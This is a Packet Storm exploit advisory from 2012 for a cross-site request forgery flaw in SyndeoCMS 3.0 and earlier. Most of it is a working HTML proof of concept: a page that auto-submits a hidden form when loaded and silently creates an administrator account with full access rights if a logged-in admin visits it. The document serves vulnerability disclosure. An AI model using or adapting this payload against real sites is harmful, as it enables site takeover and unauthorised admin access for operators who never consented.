exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SyndeoCMS 3.0 Cross Site Request Forgery

SyndeoCMS 3.0 Cross Site Request Forgery
Posted Feb 19, 2012
Authored by Ivano Binetti

SyndeoCMS versions 3.0 and below suffer from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 2957cb95f3e87834f04f61efa5d810ec4288117f1291ee5d2c4fc993fb3c3a35

SyndeoCMS 3.0 Cross Site Request Forgery

Change Mirror Download
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : SyndeoCMS <= 3.0 CSRF Vulnerability
# Date : 19-02-2012
# Author : Ivano Binetti (http://ivanobinetti.com)
# Vendor site : http://www.syndeocms.org/
# Software link : http://sourceforge.net/projects/syndeocms
# Version : 3.0 and lower
# Tested on : Debian Squeeze (6.0)
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[Add Admin Account by Ivano Binetti]--------------------------------------------------+
Summary

1)Introduction
2)Description
3)Exploit

+---------------------------------------------------------------------------------------------------------------------------------+


1)Introduction
The aim of this brief document is to describe a new CSRF vulnerability found into SyndeoCMS 3.0 and lower version and related exploit.


2)Description
This kind of vulnerability allows an attacker to add an administrator account into SyndeoCMS 3.0 (and lower) when an authenticated admin
browses a web page containing the following html/javascript code.

3)Exploit


<html>
<body onload="javascript:document.forms[0].submit()">
<H2>I'm adding ADMIN account</H2>
<form method="POST" name="form0" action="http://127.0.0.1:80/syndeocms/starnet/index.php?option=configuration&suboption=users&modoption=save_user&user_id=">
<input type="hidden" name="fullname" value="new_admin"/>
<input type="hidden" name="username" value="new_admin"/>
<input type="hidden" name="password" value="password"/>
<input type="hidden" name="email" value="admin@admin.com"/>
<input type="hidden" name="editor" value="2"/>
<input type="hidden" name="sections" value=""/>
<input type="hidden" name="access_1" value="1"/>
<input type="hidden" name="access_2" value="1"/>
<input type="hidden" name="access_13" value="1"/>
<input type="hidden" name="access_3" value="1"/>
<input type="hidden" name="access_4" value="1"/>
<input type="hidden" name="access_5" value="1"/>
<input type="hidden" name="access_6" value="1"/>
<input type="hidden" name="access_7" value="1"/>
<input type="hidden" name="access_8" value="1"/>
<input type="hidden" name="access_9" value="1"/>
<input type="hidden" name="access_16" value="1"/>
<input type="hidden" name="access_10" value="1"/>
<input type="hidden" name="access_11" value="1"/>
<input type="hidden" name="access_12" value="1"/>
<input type="hidden" name="access_14" value="1"/>
<input type="hidden" name="access_15" value="1"/>
<input type="hidden" name="m_access%5B6%5D" value="1"/>
<input type="hidden" name="m_access%5B8%5D" value="1"/>
<input type="hidden" name="m_access%5B10%5D" value="1"/>
<input type="hidden" name="m_access%5B11%5D" value="1"/>
<input type="hidden" name="m_access%5B0%5D" value="1"/>
<input type="hidden" name="m_access%5B1%5D" value="1"/>
<input type="hidden" name="m_access%5B13%5D" value="1"/>
<input type="hidden" name="m_access%5B12%5D" value="1"/>
<input type="hidden" name="m_access%5B14%5D" value="1"/>
<input type="hidden" name="m_access%5B15%5D" value="1"/>
<input type="hidden" name="m_access%5B7%5D" value="1"/>
<input type="hidden" name="m_access%5B19%5D" value="1"/>
<input type="hidden" name="m_access%5B2%5D" value="1"/>
<input type="hidden" name="m_access%5B16%5D" value="1"/>
<input type="hidden" name="m_access%5B17%5D" value="1"/>
<input type="hidden" name="m_access%5B18%5D" value="1"/>
<input type="hidden" name="m_access%5B3%5D" value="1"/>
<input type="hidden" name="m_access%5B4%5D" value="1"/>
<input type="hidden" name="m_access%5B9%5D" value="1"/>
<input type="hidden" name="m_access%5B5%5D" value="1"/>
</form>
</body>


+----------------------------------------------------------------------------------------------------------------------------------+
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close